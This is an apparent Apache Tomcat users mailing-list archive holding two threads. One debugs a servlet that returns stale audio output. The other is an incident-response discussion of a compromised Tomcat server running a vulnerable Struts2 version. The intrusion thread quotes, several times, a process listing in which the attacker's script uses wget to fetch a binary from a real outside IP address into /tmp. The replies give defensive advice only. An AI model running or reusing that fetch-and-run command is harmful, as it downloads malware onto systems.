I have the audio writing to a file after each song is added in the 
concatenation phase so that i can audibly debug and the 
concatenator is definitely struggling to find the uploaded files.

>> It seemingly randomly works correctly (i.e. outputting the
>> correctly manipulated audio file) but sometimes, the file from a
>> previous run of the program is output and I get one of these
>> errors:
>>
>> SEVERE [http-nio-8084-exec-30]
>> org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads
>> The web application [/MyApp] is still processing a request that has
>> yet to finish. This is very likely to create a memory leak. You can
>> control the time allowed for requests to finish by using the
>> unloadDelay attribute of the standard Context implementation.
>>
>> and to me seemingly random numbers of these errors:
>>
>> "SEVERE [http-nio-8084-exec-87]
>> org.apache.coyote.http11.AbstractHttp11Processor.process Error
>> processing request java.lang.IllegalStateException: The resources
>> may not be accessed if they are not currently started?"


>These kinds of things are almost always due to storing of a request or
>response option in some kind of structure that survives past the end
>of a particular request.

>Can you explain how you build the response -- specifically involving
>any non-standard threading you may do?

The response is built in a method called finish which is called in 
doPost like this :

finish(req, res);
In finish I make a printwriter
I set response content type to "application/octet-stream",
set the header  "Content-Disposition" to 
"attachment; filename=finished.wav"
I make a FileInputStream of the finished filepath
Then I set the header content length to the length of the finished file.
then I while loop the fileInputStream into the printwriter
Then I close the FIS.

I have not touched threading since it looks terrifying. 
I did experiment with making the servlet singlethreaded
since I thought it could have something to do with threads
(bad practice I know) but that did nothing to help.


>> The files always upload correctly to my filesystem, but something
>> is going wrong when I try to access them in order to process them.

>What mechanism do you use for upload?

My servlet has a location set in the @multipartconfig tag
that is where all files are saved to and retrieved from.
I am getting the Parts from the request then iterating through them,
for each part that is a file upload I use
part.write("uploadedfile" + count + ".wav"); 


>> Also when it is downloading the file it appears to the user to be
>> several MB long despite the file that is output being only a few
>> thousand KB.

>NB a few thousand KiB is the definition of several MiB.

I am possibly just an idiot on that one.
I think the deadline sleep deprivation is getting to me


>Is the response built before you stream any of it to the client? Are
>you setting a Content-Length before you send any data? Are you using
>chunked responses?

I call a finish(req, res) method in my doPost which is where all my 
response building is done. 
I am setting a content length before I send the data because I wanted
to be able to see how long it was going to take to download since the 
program is fairly slow.

>> Sometimes when it doesn't work it does not produce these errors,
>> but it never produces these errors when it works correctly.

>Does (increased) load seem to make the situation worse?

Definitely. Always happens with long audio files and only sometimes
with shorter test ones.

>> I have googled it but there's no reference to the second kind of
>> error anywhere on the web aside from svn commits by tomcat
>> developers, so while I am a total newbie to mailing lists, after
>> exhausting stackoverflow this seemed like the only place to turn
>> to. I'm developing a java EE web application in Netbeans using
>> Tomcat 8.0.3.0 on a windows 7 operating system.

>(You should upgrade to a later Tomcat 8 beta. Nothing should affect
>what you are seein

Re: Regarding i think an intrusion

[Leonardo Santagostini]

Hello Christopher, thanks for your response.

I have a copy of 4.sh and squid (binary ELF file) and tried to see using
strings what this program do. I couldn’t see anything =(

Im monitoring the server for getting a dump at the moment this injection
occurs.

Files still uploanding =(

Thanks for all, kind regards


Saludos.-
Leonardo Santagostini







2014-04-30 14:07 GMT-03:00 Christopher Schultz :

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).
>
> Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
> - -chris
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
> kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
> mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
> URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
> yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
> 0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
> cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
> ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
> F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
> 0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
> A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
> ob6Km1Clt4KNLKVyQjt+
> =8KFm
> -END PGP SIGNATURE-
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: Regarding i think an intrusion

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leonardo,

On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> Im uploading mi logfiles so it will be available when finished
> uploading.

Remember to get a thread dump while Runtime.exec() is running.

You should copy the script /tmp/4.sh somewhere else so you have a copy
in case the attacker tries to clean-up after themselves. That's
certainly what's doing the evil work.

You could probably set up iptables or something to restrict outgoing
requests so that the attack can't progress across your network.

> Regarding the configuration, its working in two other sites
> without problem, and there is no problem putting L4 balancing with
> haproxy.
> 
> I have asked developers about that exploit, still without answer.

You appear to be using struts2 2.1.8, which is in the range of
versions vulnerable to this bug. There is a workaround that you can
probably apply:
http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
section on this page).

Of course, the vulnerability doesn't allow you to simply inject code
or anything like that: you can certainly mess-around with code that is
already available on the site, though.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYS3BAAoJEBzwKT+lPKRYqDsP/jmNjM+YwxySFGgPUuvcL2bN
kkApblcr9ryGZQG6RGwUFr69FCJ8qFDQSZ0aXXxPCfTpM6ce1VqXPv+WcOwnueOF
mrugSa2InF2IWPAP2lwhEGqyxRAYZGfxz0aA9sFb7sSw4IpDP7u6TJx9g3oYrLTt
URIbzTfhY0aGgEkQlrWNgrAWFKsUQ0uOrg8+3IS52O/e1ZVdudTMQBh5/LLJ522p
yr+TlMooKDY8OA1TYttE0zEe3/Z9dd2AZ4YHoqLy8Hwq0lufYSaFZ5TpHfiOgJ0I
0Q3dcXEmjMTrBkBm4JKBR9b6KZSvG/H42q0GsEFHZeGw+3VIqYFGVRR5iCRRvVgg
cqVKgGevB+fefcbGX9IFgFnus8QMUYq4XOcsE1YJVflxVBEfgwsCDLZEJqpzbovV
ZpNBimPoLc8I5ifo2o7GSkO1GNSjhD7Q9p5MnmNW7Qna9RJh67Lv2oft9yPqGvjZ
F2dTgbKFqyr8GSy/X4Ji8FsoeK+YxF0zXXDkaXxJzu054LuhodLCHJu7WwnwGjjL
0VI/Xxfihzk9+u3HNuwK0HTEt40Tca+vEKDUlMa9fvHL3ZqM3upy50bGE0PCTrJO
A1cI+e0lzKEEQ+maym65DmSYiVvUPnfv0AxA0iUfU/UbhV1yWEkD3TyF3dOZPZqH
ob6Km1Clt4KNLKVyQjt+
=8KFm
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leigh,

On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
> My Java EE web application takes in multiple audio inputs and
> outputs them as a single wav file via an application/octet stream.

Like a mixer?

> It seemingly randomly works correctly (i.e. outputting the
> correctly manipulated audio file) but sometimes, the file from a
> previous run of the program is output and I get one of these
> errors:
> 
> SEVERE [http-nio-8084-exec-30]
> org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads
> The web application [/MyApp] is still processing a request that has
> yet to finish. This is very likely to create a memory leak. You can
> control the time allowed for requests to finish by using the
> unloadDelay attribute of the standard Context implementation.
> 
> and to me seemingly random numbers of these errors:
> 
> "SEVERE [http-nio-8084-exec-87]
> org.apache.coyote.http11.AbstractHttp11Processor.process Error
> processing request java.lang.IllegalStateException: The resources
> may not be accessed if they are not currently started?"

These kinds of things are almost always due to storing of a request or
response option in some kind of structure that survives past the end
of a particular request.

Can you explain how you build the response -- specifically involving
any non-standard threading you may do?

> The files always upload correctly to my filesystem, but something
> is going wrong when I try to access them in order to process them.

What mechanism do you use for upload?

> Also when it is downloading the file it appears to the user to be
> several MB long despite the file that is output being only a few 
> thousand KB.

NB a few thousand KiB is the definition of several MiB.

Is the response built before you stream any of it to the client? Are
you setting a Content-Length before you send any data? Are you using
chunked responses?

> Sometimes when it doesn't work it does not produce these errors,
> but it never produces these errors when it works correctly.

Does (increased) load seem to make the situation worse?

> I have googled it but there's no reference to the second kind of
> error anywhere on the web aside from svn commits by tomcat
> developers, so while I am a total newbie to mailing lists, after
> exhausting stackoverflow this seemed like the only place to turn
> to. I'm developing a java EE web application in Netbeans using
> Tomcat 8.0.3.0 on a windows 7 operating system.

(You should upgrade to a later Tomcat 8 beta. Nothing should affect
what you are seeing here, but it's not a bad idea to get the latest.)

> The web application is very basic and allows users to upload files
> via a multipart html form. This then posts to a servlet which first
> uploads these files to the programs file system and then accesses
> them, concatenates them together and saves them back on the file
> system. It's better explained by this diagram
> http://imgur.com/Oacd4gq

The real question is whether you are using non-request-processor
threads to do any of this work. Also, where are the various data
stored while you are working on them? Not the filesystem -- that seems
self-evident -- but where in the program are the String[] objects that
represent all the songs that have been uploaded?

When you process a "transaction" (upload -> merge -> respond), are you
taking care to ensure that the files are placed into different paths
for each request? How are you choosing the filename of the merged
audio clip?

> Could it be that the files are not being uploaded fully before they
> are being accessed?

I don't believe this is possible when using Tomcat's file-upload
implementation. It is certainly possible to do if you are performing
the multipart handling yourself. What tool are you using to fetch the
multipart data from the request?

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYSujAAoJEBzwKT+lPKRYBaoQALMHlZ44XuEeH0cmGGofOcTE
Hc0+T101jNxEpyUTd0dvO2u03n1Fp/a+R3vglq+gp0KwmkFZOHpdhBi0XuMbdBwx
btm1zy3c5Lico6BKh0qGWRNSqxL6RwutsLrNmi2z0N9uwHJENPl5tpPYZQXsyYEu
IBPaqRCdAJ+aJVe6zyhyOshF1cKP3/Hd8HD3OXARUVAuOaoEiGlHoq/GFx5e/I1b
JprF7hZumvc3QSwXH13dseTszVpWwljx1a+2/cPk3tyU+09soFAA2ee6sGF4NBr9
c6uB1S/dYIXGcQrJcj7ICSQNM7QKNxXUbdxBIvd7Yh51ATNcTTZxshNkyYcx1IYw
SqoojnVMd6ivXNoW2Lx8pTCSAFId0BIFh5oJdPAUf5kV1fkGQXzrUVlz/OfVhPd/
mZXlYiuczDPz2mI9zxxzY0RTU/pB3ckXYQ7ByQE4m8+YPXo5adw+ZHmH0QeFMVlE
khWVte3MKUIWMBPdnYKQXQp+f+Uph6yl2XHyRAZ1l/KrrTTzcuqAzsOIaW5/x85u
a3YMDJdcHHZ+k4Uvn6w6tjZxD8TXBNXcvB0ue5rTPeOiqAeSHojwLupDFG+2XyHh
SAc4J0FMmDwu9AZKH2mjfYuaFIpy2ncHB7FwCuYz2dBxiTfnLyOBJcSNgSj7f18a
rAlcVsS/LEcFyS0wgGrt
=YahV
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: Regarding i think an intrusion

[Leonardo Santagostini]

Hello Martin/Felix,

Im uploading mi logfiles so it will be available when finished uploading.

Regarding the configuration, its working in two other sites without
problem, and there is no problem putting L4 balancing with haproxy.

I have asked developers about that exploit, still without answer.

I will let you know how things are going, thanks for all =)

Regards/Saludos!

BTW: Martin, thanks for your spanish words  Really appreciate =)

Saludos.-
Leonardo Santagostini







2014-04-30 13:20 GMT-03:00 Felix Schumacher <
felix.schumac...@internetallee.de>:

>
>
> On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <
> lsantagost...@gmail.com> wrote:
> >Hello list,
> >
> >well my homework is done
> >
> >Here are the links:
> >
> >setenv.sh: http://pastebin.com/EN1mXDFi
> >catalina.sh: http://pastebin.com/1vRVLbSm
> >web.xml: http://pastebin.com/BqEfiXXm
> >server.xml: http://pastebin.com/wfzE8bYU
> >logging.properties: http://pastebin.com/Qurk8sLU
> >catalina.properties: http://pastebin.com/jkfY1ZRQ
> >tree + logsfiles: http://pastebin.com/j3tip4ij
>
> From the logfiles it looks like you have struts2 applications. It might be
> that you are hit by a security problem within struts2 ( Konstantin
> forwarded a warning a few days ago
> http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).
>
> >
> >Note that logsfiles, are not the logfiles itsef but only a ls -lah
> >(just
> >for you to see the logsizes)
> >
> >A little more about the infraestructure i've mounted ill do some ascii
> >art.
> >
> >
> >internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> >(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
> That seems a bit too complex. In my eyes you need no haproxy between httpd
> and tomcat when you use mod_jk.
>
> Regards
>  Felix
> >
> >
> >Apache(2) is serving static content so haproxy(1) at the first level
> >does
> >http round robin balancing
> >Apache(2) connects to tomcat(5) through haproxy(4) (using L4
> >connection)
> >using mod_jk(3)
> >Tomcat(5) are the main app server (the ones gets intruded) who uses
> >tomcat(7) (solr service) using haproxy(6) using L4 connection.
> >
> >Versions:
> >
> >Apache: 2.2.17
> >mod_jk: 1.2.31
> >haproxy: 1.4.22
> >Tomcat: 7.0.53
> >Java: 1.6.0.41
> >
> >[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> >java version "1.6.0_41"
> >Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> >Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> >
> >OS: CentOS 5.8 64 bit
> >
> >[root@arcbaappvrt05 tomcat]# uname -a
> >Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
> >21
> >20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> >[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> >CentOS release 5.8 (Final)
> >[root@arcbaappvrt05 tomcat]#
> >
> >For now i havent see that the squid process whas launched so i couldnt
> >do a
> >dump
> >
> >Letme know if you need more information.
> >
> >BTW, pastebin links will work for one week.
> >
> >Kind regards, yours
> >
> >
> >
> >
> >Saludos.-
> >Leonardo Santagostini
> >
> >
> >
> >
> >
> >
> >
> >2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
> >:
> >
> >> Ok, i will do the following:
> >>
> >> 1) thread dump of running tomcat instance
> >> 2) Pastebin the running tomcat config
> >>
> >> I think at mid day will have all the info.
> >>
> >> Thanks all for replying me and all the responses.
> >>
> >> Regards, Leonardo
> >>
> >> Saludos.-
> >> Leonardo Santagostini
> >>
> >> 
> >>
> >>
> >>
> >>
> >>
> >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> >> ch...@christopherschultz.net>:
> >>
> >> -BEGIN PGP SIGNED MESSAGE-
> >>> Hash: SHA256
> >>>
> >>> Konstantin,
> >>>
> >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >>> > :
> >>> >> Hello Dan,
> >>> >>
> >>> >> Nop, the attacker is executing locally the following
> >>> >>
> >>> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
> >>> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
> >>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>> >>
> >>> >> And the launch squid who tries to connect via ssh to varoius
> >>> >> places.
> >>> >>
> >>> >> Right now its time to leave the office, but in a few hours i will
> >>> >> paste in pastebin access logs, config files, wherever you tell
> >>> >> me.
> >>> >>
> >>> >> This is my pstree
> >>> >>
> >>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >>> >> ├─java─┬─sh───wget │  └─263*[{java}]
> >>> >
> >>> > sh launched by tomcat's java?
> >>>
> >>> Yes: please verify that it's the JVM running Tomcat, and not just
> >any
> >>> JVM process.
> >>>
> >>> > Take a thread dump:
> >>> >
> >>>
> >
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of

Re: Regarding i think an intrusion

[Felix Schumacher]

On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini 
 wrote:
>Hello list,
>
>well my homework is done
>
>Here are the links:
>
>setenv.sh: http://pastebin.com/EN1mXDFi
>catalina.sh: http://pastebin.com/1vRVLbSm
>web.xml: http://pastebin.com/BqEfiXXm
>server.xml: http://pastebin.com/wfzE8bYU
>logging.properties: http://pastebin.com/Qurk8sLU
>catalina.properties: http://pastebin.com/jkfY1ZRQ
>tree + logsfiles: http://pastebin.com/j3tip4ij

>From the logfiles it looks like you have struts2 applications. It might be 
>that you are hit by a security problem within struts2 ( Konstantin forwarded a 
>warning a few days ago 
>http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html
> ).

>
>Note that logsfiles, are not the logfiles itsef but only a ls -lah
>(just
>for you to see the logsizes)
>
>A little more about the infraestructure i've mounted ill do some ascii
>art.
>
>
>internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
>(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)

That seems a bit too complex. In my eyes you need no haproxy between httpd and 
tomcat when you use mod_jk.

Regards
 Felix
>
>
>Apache(2) is serving static content so haproxy(1) at the first level
>does
>http round robin balancing
>Apache(2) connects to tomcat(5) through haproxy(4) (using L4
>connection)
>using mod_jk(3)
>Tomcat(5) are the main app server (the ones gets intruded) who uses
>tomcat(7) (solr service) using haproxy(6) using L4 connection.
>
>Versions:
>
>Apache: 2.2.17
>mod_jk: 1.2.31
>haproxy: 1.4.22
>Tomcat: 7.0.53
>Java: 1.6.0.41
>
>[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
>java version "1.6.0_41"
>Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
>Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
>OS: CentOS 5.8 64 bit
>
>[root@arcbaappvrt05 tomcat]# uname -a
>Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb
>21
>20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
>[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
>CentOS release 5.8 (Final)
>[root@arcbaappvrt05 tomcat]#
>
>For now i havent see that the squid process whas launched so i couldnt
>do a
>dump
>
>Letme know if you need more information.
>
>BTW, pastebin links will work for one week.
>
>Kind regards, yours
>
>
>
>
>Saludos.-
>Leonardo Santagostini
>
>
>
>
>
>
>
>2014-04-30 11:09 GMT-03:00 Leonardo Santagostini
>:
>
>> Ok, i will do the following:
>>
>> 1) thread dump of running tomcat instance
>> 2) Pastebin the running tomcat config
>>
>> I think at mid day will have all the info.
>>
>> Thanks all for replying me and all the responses.
>>
>> Regards, Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> 
>>
>>
>>
>>
>>
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
>> ch...@christopherschultz.net>:
>>
>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA256
>>>
>>> Konstantin,
>>>
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>>> > :
>>> >> Hello Dan,
>>> >>
>>> >> Nop, the attacker is executing locally the following
>>> >>
>>> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
>>> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
>>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>> >>
>>> >> And the launch squid who tries to connect via ssh to varoius
>>> >> places.
>>> >>
>>> >> Right now its time to leave the office, but in a few hours i will
>>> >> paste in pastebin access logs, config files, wherever you tell
>>> >> me.
>>> >>
>>> >> This is my pstree
>>> >>
>>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>>> >> ├─java─┬─sh───wget │  └─263*[{java}]
>>> >
>>> > sh launched by tomcat's java?
>>>
>>> Yes: please verify that it's the JVM running Tomcat, and not just
>any
>>> JVM process.
>>>
>>> > Take a thread dump:
>>> >
>>>
>https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>> >
>>> >  It shall show what is stacktrace in thread that launched external
>>> > process.
>>>
>>> +1
>>>
>>> The only things that ship with Tomcat that call Process.exec() are
>the
>>> CGI servlet and SSI, both of which are disabled by default. So,
>either
>>> you have an insecure CGI/SSI configuration, your web application has
>a
>>> vulnerability, or you have deployed something like the Manager
>>> application and improperly-secured it.
>>>
>>> A classic example of such an intrusion might be that someone got a
>>> foothold elsewhere into your network, and the Manager web
>application
>>> is not properly secured with a password, etc.
>>>
>>> - -chris
>>> -BEGIN PGP SIGNATURE-
>>> Version: GnuPG v1
>>> Comment: GPGTools - http://gpgtools.org
>>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>>
>>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>>> +qqdL7O61

RE: Regarding i think an intrusion

[Martin Gainty]

> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
> 
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij

MG>Por favor, pegue el contenido de los siguientes archivos de registros en 
Pastebin y enviarnos link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 
localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat  5.4M Apr 30 12:19 
localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 
PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat   43M Apr 30 12:18 
portal-ht.log-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 
portal-mh.log-rw-rw-r-- 1 tomcat tomcat   58M Apr 30 12:19 
portal-pdi.log-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG>Saludos Cordiales desde EEUU

> 
> Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
> for you to see the logsizes)
> 
> A little more about the infraestructure i've mounted ill do some ascii art.
> 
> 
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
> 
> 
> Apache(2) is serving static content so haproxy(1) at the first level does
> http round robin balancing
> Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
> using mod_jk(3)
> Tomcat(5) are the main app server (the ones gets intruded) who uses
> tomcat(7) (solr service) using haproxy(6) using L4 connection.
> 
> Versions:
> 
> Apache: 2.2.17
> mod_jk: 1.2.31
> haproxy: 1.4.22
> Tomcat: 7.0.53
> Java: 1.6.0.41
> 
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41"
> Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> 
> OS: CentOS 5.8 64 bit
> 
> [root@arcbaappvrt05 tomcat]# uname -a
> Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
> 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> CentOS release 5.8 (Final)
> [root@arcbaappvrt05 tomcat]#
> 
> For now i havent see that the squid process whas launched so i couldnt do a
> dump
> 
> Letme know if you need more information.
> 
> BTW, pastebin links will work for one week.
> 
> Kind regards, yours
> 
> 
> 
> 
> Saludos.-
> Leonardo Santagostini
> 
> 
> 
> 
> 
> 
> 
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini :
> 
> > Ok, i will do the following:
> >
> > 1) thread dump of running tomcat instance
> > 2) Pastebin the running tomcat config
> >
> > I think at mid day will have all the info.
> >
> > Thanks all for replying me and all the responses.
> >
> > Regards, Leonardo
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > 
> >
> >
> >
> >
> >
> > 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> > ch...@christopherschultz.net>:
> >
> > -BEGIN PGP SIGNED MESSAGE-
> >> Hash: SHA256
> >>
> >> Konstantin,
> >>
> >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >> > :
> >> >> Hello Dan,
> >> >>
> >> >> Nop, the attacker is executing locally the following
> >> >>
> >> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
> >> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
> >> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >> >>
> >> >> And the launch squid who tries to connect via ssh to varoius
> >> >> places.
> >> >>
> >> >> Right now its time to leave the office, but in a few hours i will
> >> >> paste in pastebin access logs, config files, wherever you tell
> >> >> me.
> >> >>
> >> >> This is my pstree
> >> >>
> >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> >> ├─java─┬─sh───wget │  └─263*[{java}]
> >> >
> >> > sh launched by tomcat's java?
> >>
> >> Yes: please verify that it's the JVM running Tomcat, and not just any
> >> JVM process.
> >>
> >> > Take a thread dump:
> >> >
> >> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >> >
> >> >  It shall show what is stacktrace in thread that launched external
> >> > process.
> >>
> >> +1
> >>
> >> The only things that ship with Tomcat that call Process.exec() are the
> >> CGI servlet and SSI, both of which are disabled by default. So, either
> >> you have an insecure CGI/SSI configuration, your web application

Re: Regarding i think an intrusion

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leonardo,

You need to post a thread dump as well.

- -chris

On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: 
> http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm
>  server.xml: http://pastebin.com/wfzE8bYU logging.properties: 
> http://pastebin.com/Qurk8sLU catalina.properties: 
> http://pastebin.com/jkfY1ZRQ tree + logsfiles: 
> http://pastebin.com/j3tip4ij
> 
> Note that logsfiles, are not the logfiles itsef but only a ls -lah 
> (just for you to see the logsizes)
> 
> A little more about the infraestructure i've mounted ill do some 
> ascii art.
> 
> 
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk 
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
> 
> 
> Apache(2) is serving static content so haproxy(1) at the first 
> level does http round robin balancing Apache(2) connects to 
> tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
>  Tomcat(5) are the main app server (the ones gets intruded) who 
> uses tomcat(7) (solr service) using haproxy(6) using L4 
> connection.
> 
> Versions:
> 
